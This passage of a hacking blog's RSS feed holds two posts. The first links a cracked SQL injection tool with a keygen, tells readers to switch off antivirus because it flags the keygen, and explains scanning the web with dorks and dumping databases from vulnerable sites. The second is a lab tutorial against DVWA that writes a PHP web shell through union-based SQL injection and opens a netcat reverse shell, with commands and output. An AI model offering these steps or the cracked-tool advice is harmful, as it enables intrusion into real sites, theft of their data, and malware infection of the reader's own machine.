<p style="text-align: center;"><span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fwww.fshare.vn%2Ffile%2FDXAESJ19VF9N" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';"><strong><span style="font-size: 12pt;">Download SQLi Dumper v10.1 Cracked</span></strong></a></span></p>
<h2 id="ftoc-cach-crack" class="ftwp-heading"><strong><span style="color: #800080;"><span style="font-size: 14pt;">How to crack</span></span></strong></h2>
<p><span style="color: #000000;"><strong><span style="font-size: 12pt;">Step 1: </span></strong><span style="font-size: 12pt;">Turn on the keygen file to get the key</span></span></p>
<p style="text-align: center;"><img decoding="async" class="alignnone size-medium wp-image-6661" src="https://anonyviet.com/wp-content/uploads/2017/10/SQLi-2-300x72.png" alt="Download SQLi Dumper v10.1 Full - Tool to exploit SQL Injection 11" width="300" height="72" srcset="https://anonyviet.com/wp-content/uploads/2017/10/SQLi-2-300x72.png 300w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-2.png 385w" sizes="(max-width: 300px) 100vw, 300px" title="Download SQLi Dumper v10.1 Full - SQL Injection 12 Exploit Tool"/></p>
<p><span style="font-size: 12pt;"><strong><span style="color: #000000;">Step 2:</span></strong><span style="color: #000000;">  Run the program and paste the key in</span></span></p>
<p><strong><span style="color: #000000;"><span style="font-size: 12pt;">Note: when turning on the keygen file, please turn off the computer protection software because these software mistakenly identify as containing viruses.</span></span></strong></p>
<h2 id="ftoc-cach-su-dung-sqli-dumper-v10-1" class="ftwp-heading"><strong><span style="color: #800080;"><span style="font-size: 18pt;">How to use SQLi Dumper v10.1</span></span></strong></h2>
<p><strong><span style="color: #000000;"><span style="font-size: 12pt;">Step 1: </span></span></strong><span style="color: #000000;"><span style="font-size: 12pt;">open the software</span></span></p>
<p style="text-align: center;"><img decoding="async" loading="lazy" class="alignnone wp-image-6663" src="https://anonyviet.com/wp-content/uploads/2017/10/SQLi-3-300x169.png" alt="Download SQLi Dumper v10.1 Full - SQL Injection 12 Exploit Tool" width="557" height="314" srcset="https://anonyviet.com/wp-content/uploads/2017/10/SQLi-3-300x169.png 300w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-3-1024x576.png 1024w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-3-768x432.png 768w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-3-1536x864.png 1536w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-3-750x422.png 750w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-3-1140x641.png 1140w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-3.png 1600w" sizes="auto, (max-width: 557px) 100vw, 557px" title="Download SQLi Dumper v10.1 Full - Tool to exploit SQL Injection errors 13"/></p>
<p><strong>Step 2:</strong> This is the main interface of the software</p>
<p style="text-align: center;"><img decoding="async" loading="lazy" class="alignnone wp-image-6665" src="https://anonyviet.com/wp-content/uploads/2017/10/SQLi-1-300x162.png" alt="Download SQLi Dumper v10.1 Full - Tool to exploit SQL Injection errors 13" width="555" height="300" srcset="https://anonyviet.com/wp-content/uploads/2017/10/SQLi-1-300x162.png 300w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-1-768x415.png 768w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-1-1024x553.png 1024w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-1-696x376.png 696w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-1-1068x577.png 1068w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-1-778x420.png 778w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-1.png 1594w" sizes="auto, (max-width: 555px) 100vw, 555px" title="Download SQLi Dumper v10.1 Full - SQL Injection 14 . Exploit Tool"/></p>
<p>Below is a list of dorks used to scan:</p>
<p style="text-align: center;"><span style="font-size: 12pt;"><strong>Dork scans the site</strong></span></p>
<p><span style="font-size: 12pt;"><span style="color: #000000;"><strong>Step 3: </strong>Once you have the dork, you paste it in, select start scanner and start scanning</span></span></p>
<p style="text-align: center;"><img decoding="async" loading="lazy" class="alignnone wp-image-6666" src="https://anonyviet.com/wp-content/uploads/2017/10/sqli-1-1-300x162.png" alt="Download SQLi Dumper v10.1 Full - SQL Injection 14 . Exploit Tool" width="548" height="296" srcset="https://anonyviet.com/wp-content/uploads/2017/10/sqli-1-1-300x162.png 300w, https://anonyviet.com/wp-content/uploads/2017/10/sqli-1-1-1024x552.png 1024w, https://anonyviet.com/wp-content/uploads/2017/10/sqli-1-1-768x414.png 768w, https://anonyviet.com/wp-content/uploads/2017/10/sqli-1-1-1536x828.png 1536w, https://anonyviet.com/wp-content/uploads/2017/10/sqli-1-1-750x404.png 750w, https://anonyviet.com/wp-content/uploads/2017/10/sqli-1-1-1140x615.png 1140w, https://anonyviet.com/wp-content/uploads/2017/10/sqli-1-1.png 1595w" sizes="auto, (max-width: 548px) 100vw, 548px" title="Download SQLi Dumper v10.1 Full - SQL Injection 15 . Exploit Tool"/></p>
<p><strong>Step 4:</strong> After you have scanned enough, you switch to the Exploitables page and select start Exploitables to continue scanning</p>
<p style="text-align: center;"><img decoding="async" loading="lazy" class="alignnone wp-image-6667" src="https://anonyviet.com/wp-content/uploads/2017/10/SQLi-4-300x162.png" alt="Download SQLi Dumper v10.1 Full - SQL Injection 15 . Exploit Tool" width="545" height="294" srcset="https://anonyviet.com/wp-content/uploads/2017/10/SQLi-4-300x162.png 300w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-4-1024x552.png 1024w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-4-768x414.png 768w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-4-1536x829.png 1536w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-4-750x405.png 750w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-4-1140x615.png 1140w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-4.png 1594w" sizes="auto, (max-width: 545px) 100vw, 545px" title="Download SQLi Dumper v10.1 Full - SQL Injection 16 . Exploit Tool"/></p>
<p style="text-align: left;"><strong>Step 5:</strong> After scanning is complete, switch to Injectables and select start Analyzer to check the site for errors</p>
<p style="text-align: center;"><img decoding="async" loading="lazy" class="alignnone wp-image-6668" src="https://anonyviet.com/wp-content/uploads/2017/10/SQLi-5-300x162.png" alt="Download SQLi Dumper v10.1 Full - SQL Injection 16 . Exploit Tool" width="561" height="303" srcset="https://anonyviet.com/wp-content/uploads/2017/10/SQLi-5-300x162.png 300w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-5-1024x553.png 1024w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-5-768x415.png 768w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-5-1536x829.png 1536w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-5-750x405.png 750w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-5-1140x615.png 1140w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-5.png 1595w" sizes="auto, (max-width: 561px) 100vw, 561px" title="Download SQLi Dumper v10.1 Full - Tool to exploit SQL Injection 17"/></p>
<p style="text-align: left;"><strong><span style="font-size: 12pt;">Step 6: </span></strong><span style="font-size: 12pt;">Once there is an error site, right click and select go to dumper </span></p>
<p style="text-align: center;"><img decoding="async" loading="lazy" class="alignnone wp-image-6669" src="https://anonyviet.com/wp-content/uploads/2017/10/SQLi-6-300x162.png" alt="Download SQLi Dumper v10.1 Full - Tool to exploit SQL Injection 17" width="559" height="302" srcset="https://anonyviet.com/wp-content/uploads/2017/10/SQLi-6-300x162.png 300w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-6-1024x551.png 1024w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-6-768x414.png 768w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-6-1536x827.png 1536w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-6-750x404.png 750w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-6-1140x614.png 1140w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-6.png 1595w" sizes="auto, (max-width: 559px) 100vw, 559px" title="Download SQLi Dumper v10.1 Full - SQL Injection 18 . Exploit Tool"/></p>
<p><strong>Here:</strong></p>
<ul>
<li>First choose databases to get data</li>
<li>next, select get columns to get column</li>
<li>Finally, check the lines and select dump data to get information</li>
</ul>
<p style="text-align: right;"><strong>MK-39</strong></p>
<p style="text-align: right;"><span style="font-size: 12pt;"><strong>Good luck</strong></span></p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;6659&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/download-sqli-dumper-v10-1-full-sql-injection-error-exploit-tool/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2017/10/SQLi-5.png" medium="image"></media:content>
            	</item>
		<item>
		<title>Use SQL Injection to run commands and gain shell permissions</title>
		<link>https://en.anonyviet.com/use-sql-injection-to-run-commands-and-gain-shell-permissions/</link>
					<comments>https://en.anonyviet.com/use-sql-injection-to-run-commands-and-gain-shell-permissions/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Tue, 24 Jan 2023 19:13:38 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[commands]]></category>
		<category><![CDATA[gain]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[permissions]]></category>
		<category><![CDATA[Run]]></category>
		<category><![CDATA[Shell]]></category>
		<category><![CDATA[SQL]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=2111</guid>

					<description><![CDATA[One of the ultimate goals of hacking is to hijack and up the shell to run system commands and hit a target or network. SQL injection are usually just associated with databases and their data, but it can actually be used as a vector to capture shells. In this article, we will exploit a simple [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p>One of the ultimate goals of hacking is to hijack and up the shell to run system commands and hit a target or network. <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fsql-injection-la-gi-lam-the-nao-de-ngan-chan-lo-hong-sql-injection%2F" rel="noopener" class="local-link">SQL injection</a> are usually just associated with databases and their data, but it can actually be used as a vector to capture shells.  In this article, we will exploit a simple SQL injection vulnerability to execute commands and eventually decompile the shell on the server.</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2022%2F03%2Fsql-injection-shell-1.jpg" rel="noopener" class="local-link"><img post-id="2111" fifu-featured="1" decoding="async" class="aligncenter size-full wp-image-40462" src="https://anonyviet.com/wp-content/uploads/2022/03/sql-injection-shell-1.jpg" alt="Use SQL Injection to run commands and gain shell permissions" title="Use SQL Injection to run commands and gain shell permissions" width="782" height="512" srcset="https://anonyviet.com/wp-content/uploads/2022/03/sql-injection-shell-1.jpg 782w, https://anonyviet.com/wp-content/uploads/2022/03/sql-injection-shell-1-300x196.jpg 300w, https://anonyviet.com/wp-content/uploads/2022/03/sql-injection-shell-1-768x503.jpg 768w, https://anonyviet.com/wp-content/uploads/2022/03/sql-injection-shell-1-750x491.jpg 750w" sizes="(max-width: 782px) 100vw, 782px" title="Using SQL Injection to Run Commands and Hijack Shell 13"/></a></p>
<p>I will use DVWA, a vulnerable virtual machine, and Kali Linux to perform the attack.  If you are new to Kali, you should <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2F10-viec-can-lam-sau-khi-cai-dat-kali-linux%2F" rel="noopener" class="local-link">read this post</a> for how to set up and secure Kali, to make sure your system is ready for anything.</p>
<h2 id="ftoc-tong-quan-ve-sql-injection" class="ftwp-heading">SQL Injection Overview</h2>
<p>SQL injection is one of the most common vulnerabilities encountered on the web and can also be one of the most dangerous.  Attackers can inject malicious SQL code to extract sensitive information, modify or destroy existing data, or escalate an attack to take over the server.</p>
<p>There are different types of SQL injection and different attack methods for different database systems in use.  Although this type of attack is one of the easiest to start learning, it can still take you several years to master SQL injection.</p>
<h3 id="ftoc-buoc-1-tham-do-muc-tieu" class="ftwp-heading">Step 1: Target exploration</h3>
<p>The first thing we need to do is log in to DVWA using the default credentials, <strong>admin </strong>is the username and the password is <strong>password</strong>.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-40446 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/03/use-sql-injection-run-os-commands-get-shell.w1456.jpg" alt="Using SQL Injection to run commands and hijack Shell 11" width="858" height="446" srcset="https://anonyviet.com/wp-content/uploads/2022/03/use-sql-injection-run-os-commands-get-shell.w1456.jpg 858w, https://anonyviet.com/wp-content/uploads/2022/03/use-sql-injection-run-os-commands-get-shell.w1456-300x156.jpg 300w, https://anonyviet.com/wp-content/uploads/2022/03/use-sql-injection-run-os-commands-get-shell.w1456-768x399.jpg 768w, https://anonyviet.com/wp-content/uploads/2022/03/use-sql-injection-run-os-commands-get-shell.w1456-750x390.jpg 750w" sizes="auto, (max-width: 858px) 100vw, 858px" title="Using SQL Injection to Run Commands and Hijack Shell 14"/></p>
<p>Next, go to the “Security” tab on the left and set the security level to “low”.  This will ensure our attack goes smoothly.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-40447 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/03/use-sql-injection-run-os-commands-get-shell.w1456-1.jpg" alt="Using SQL Injection to Run Commands and Hijack Shell 12" width="1092" height="407" srcset="https://anonyviet.com/wp-content/uploads/2022/03/use-sql-injection-run-os-commands-get-shell.w1456-1.jpg 1092w, https://anonyviet.com/wp-content/uploads/2022/03/use-sql-injection-run-os-commands-get-shell.w1456-1-300x112.jpg 300w, https://anonyviet.com/wp-content/uploads/2022/03/use-sql-injection-run-os-commands-get-shell.w1456-1-1024x382.jpg 1024w, https://anonyviet.com/wp-content/uploads/2022/03/use-sql-injection-run-os-commands-get-shell.w1456-1-768x286.jpg 768w, https://anonyviet.com/wp-content/uploads/2022/03/use-sql-injection-run-os-commands-get-shell.w1456-1-750x280.jpg 750w" sizes="auto, (max-width: 1092px) 100vw, 1092px" title="Using SQL Injection to Run Commands and Hijack Shell 15"/></p>
<p>Navigate to the “SQL Injection” page to initiate the attack.  We can see that the function of the page is to get the user ID and return information, in this case the first and last name.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-40448 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/03/use-sql-injection-run-os-commands-get-shell.w1456-2.jpg" alt="Using SQL Injection to Run Commands and Hijack Shell 13" width="1092" height="409" srcset="https://anonyviet.com/wp-content/uploads/2022/03/use-sql-injection-run-os-commands-get-shell.w1456-2.jpg 1092w, https://anonyviet.com/wp-content/uploads/2022/03/use-sql-injection-run-os-commands-get-shell.w1456-2-300x112.jpg 300w, https://anonyviet.com/wp-content/uploads/2022/03/use-sql-injection-run-os-commands-get-shell.w1456-2-1024x384.jpg 1024w, https://anonyviet.com/wp-content/uploads/2022/03/use-sql-injection-run-os-commands-get-shell.w1456-2-768x288.jpg 768w, https://anonyviet.com/wp-content/uploads/2022/03/use-sql-injection-run-os-commands-get-shell.w1456-2-750x281.jpg 750w" sizes="auto, (max-width: 1092px) 100vw, 1092px" title="Using SQL Injection to run commands and take over Shell 16"/></p>
<p>I want to verify that this input is indeed vulnerable to SQL injection.  The first thing to try is to simply enter a single double quote, which will close the statement if the system is really vulnerable.  And when I do so, the system returns an error, even telling us specifically that the website is using MySQL as the database.  At this point, we&#8217;ve most likely found a vulnerable entry point.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-40449 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/03/use-sql-injection-run-os-commands-get-shell.w1456-3.jpg" alt="Using SQL Injection to Run Commands and Hijack Shell 14" width="717" height="117" srcset="https://anonyviet.com/wp-content/uploads/2022/03/use-sql-injection-run-os-commands-get-shell.w1456-3.jpg 717w, https://anonyviet.com/wp-content/uploads/2022/03/use-sql-injection-run-os-commands-get-shell.w1456-3-300x49.jpg 300w" sizes="auto, (max-width: 717px) 100vw, 717px" title="Using SQL Injection to run commands and hijack Shell 17"/></p>
<p>The next thing we need to do is enumerate the database and determine the number of columns in use.  This will allow us to reliably exploit the union-based vulnerability in just a little bit.  For a better understanding, let&#8217;s see what the query command would look like during normal input submission:</p>
<pre class="syntax-highlighted"><code class="language-unknown">select first_name, surname from users where user_id='';</code></pre>
<p>This could be a query on the backend, with <strong>first_name</strong> and <strong>surname</strong> are selected columns, for a total of two columns.  But we need to know for sure for this vulnerability to work.  We can use <strong>order by</strong>.</p>
<p>This clause will sort the results of the query by columns.  Since we are pretty sure that at least two columns are in use, if we will sort by 1 or 2, the query will succeed.  But what if we want to order by 3?  If we are correct, then this query will throw an error.</p>
<p>Send the following injection as input, and it will result in an error.  The pound sign is used here to comment out the rest of the query so it doesn&#8217;t cause any additional syntax errors.</p>
<pre class="syntax-highlighted"><code class="language-unknown">' order by 3 #</code></pre>
<p>You can see that we actually got an error, so now we know for sure that only two columns are being used.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-40450 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/03/use-sql-injection-run-os-commands-get-shell.w1456-4.jpg" alt="Using SQL Injection to Run Commands and Hijack Shell 15" width="603" height="116" srcset="https://anonyviet.com/wp-content/uploads/2022/03/use-sql-injection-run-os-commands-get-shell.w1456-4.jpg 603w, https://anonyviet.com/wp-content/uploads/2022/03/use-sql-injection-run-os-commands-get-shell.w1456-4-300x58.jpg 300w" sizes="auto, (max-width: 603px) 100vw, 603px" title="Using SQL Injection to run commands and hijack Shell 18"/></p>
<h3 id="ftoc-buoc-2-truy-cap-shell-va-khai-thac-lenh" class="ftwp-heading">Step 2: Access the shell and exploit the command</h3>
<p>Now that we have a bit more information about the database, we can use this to our advantage to perform SQL injection based on <strong>union</strong>.  The union operator is used in SQL to combine the results of two or more select statements, but for it to work properly, the statements must have the same number of columns.  This is why we need to learn the backend sooner.</p>
<p>There&#8217;s a lot we can do with injections based on <strong>union</strong>, but in this article, we need to take care of taking advantage of this vulnerability to run operating system commands.  One of the easiest ways to do this is to upload a simple PHP shell to pass our commands through.</p>
<p>We need to specify the root directory of the web server to load the shell.  Depending on the application and the type of web server in use, the root directory may differ, especially if the administrator changes the default location or has sufficient permissions.  For the purposes of this attack, I will assume that the default Apache web root (/var/www/) is being used with public write permissions.  Information about the web server, including the root directory, can usually be found in the “phpinfo.php” file.</p>
<p>We can use the into outfile command to write to a file.  In this case, we will insert a simple PHP script that can run system commands.  The script that I named “cmd.php”, will look like this:</p>
<pre class="syntax-highlighted"><code class="language-unknown">&lt;?php system($_GET["cmd"]); ?&gt;</code></pre>
<p>Now, we will do the injection.  We will need to use double quotes in the script because we need to enclose the second part of the statement in single quotes – this will avoid syntax errors.  The complete injection command should look like this:</p>
<pre class="syntax-highlighted"><code class="language-unknown">' union select 1, '&lt;?php system($_GET["cmd"]); ?&gt;' into outfile '/var/www/dvwa/cmd.php' #</code></pre>
<p>If this command works properly, we will be able to access our shell through the URL and by providing the system command as a parameter.  For example, whoami will give us the current user information.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-40451 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/03/use-sql-injection-run-os-commands-get-shell.w1456-5.jpg" alt="Using SQL Injection to run commands and take over Shell 16" width="620" height="130" srcset="https://anonyviet.com/wp-content/uploads/2022/03/use-sql-injection-run-os-commands-get-shell.w1456-5.jpg 620w, https://anonyviet.com/wp-content/uploads/2022/03/use-sql-injection-run-os-commands-get-shell.w1456-5-300x63.jpg 300w" sizes="auto, (max-width: 620px) 100vw, 620px" title="Using SQL Injection to run commands and hijack shell 19"/></p>
<p>Or uname -a, will give us information about the system.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-40452 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/03/use-sql-injection-run-os-commands-get-shell.w1456-6.jpg" alt="Using SQL Injection to run commands and hijack Shell 17" width="887" height="133" srcset="https://anonyviet.com/wp-content/uploads/2022/03/use-sql-injection-run-os-commands-get-shell.w1456-6.jpg 887w, https://anonyviet.com/wp-content/uploads/2022/03/use-sql-injection-run-os-commands-get-shell.w1456-6-300x45.jpg 300w, https://anonyviet.com/wp-content/uploads/2022/03/use-sql-injection-run-os-commands-get-shell.w1456-6-768x115.jpg 768w, https://anonyviet.com/wp-content/uploads/2022/03/use-sql-injection-run-os-commands-get-shell.w1456-6-750x112.jpg 750w" sizes="auto, (max-width: 887px) 100vw, 887px" title="Using SQL Injection to run commands and take over shell 20"/></p>
<p>But providing all these commands via the URL parameter is boring.  We can take advantage of this to reverse the shell and go one step further.</p>
<h3 id="ftoc-buoc-3-dich-nguoc-shell-voi-netcat" class="ftwp-heading">Step 3: Decompile Shell with Netcat</h3>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fnull-byte.wonderhowto.com%2Fhow-to%2Fhack-like-pro-use-netcat-swiss-army-knife-hacking-tools-0148657%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Netcat</a> is a powerful network utility used to troubleshoot connection problems, but it can actually be used by hackers as a backdoor and as a method to hijack shells.  A lot of Linux distributions have this utility installed by default, so if we can access this tool it&#8217;s game over.</p>
<p>First, we&#8217;ll need to set up a listener on our local machine.  Use the nc command along with -lvp to specify it to listen and to set the corresponding port number.</p>
<pre class="syntax-highlighted"><code class="language-unknown">nc -lvp 1234&#13;
listening on [any] 1234 ...</code></pre>
<p>Next, as a parameter to the PHP shell in the URL, enter the following command.  It asks the server to execute a shell (-e/bin/sh) and sends it back to our local machine.  You need to make sure to use the proper IP address and port.</p>
<pre class="syntax-highlighted"><code class="language-unknown">nc 172.16.1.100 1234 -e /bin/sh</code></pre>
<p>Wait a few seconds and we should see our listener catch the shell and open a connection.  From here, we can run commands like id, uname -a and ps.</p>
<pre class="syntax-highlighted"><code class="language-unknown">connect to [172.16.1.100] from (UNKNOWN) [172.16.1.102] 47643&#13;
id&#13;
uid=33(www-data) gid=33(www-data) groups=33(www-data)&#13;
uname -a&#13;
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux&#13;
ps&#13;
  PID TTY          TIME CMD&#13;
 4665 ?        00:00:00 apache2&#13;
 4669 ?        00:00:00 apache2&#13;
 4671 ?        00:00:00 apache2&#13;
 4673 ?        00:00:00 apache2&#13;
 4674 ?        00:00:00 apache2&#13;
 4803 ?        00:00:00 apache2&#13;
 4810 ?        00:00:00 apache2&#13;
 4914 ?        00:00:00 php&#13;
 4915 ?        00:00:00 sh&#13;
 4919 ?        00:00:00 ps</code></pre>
<p>We now have the means to execute commands on the web server from our own terminal, all stemming from a simple SQL injection vulnerability.  I hope this practical article will help you acquire more knowledge.</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;40444&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/use-sql-injection-to-run-commands-and-gain-shell-permissions/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2022/03/sql-injection-shell-1.jpg" medium="image"></media:content>
            	</item>
	</channel>
</rss>
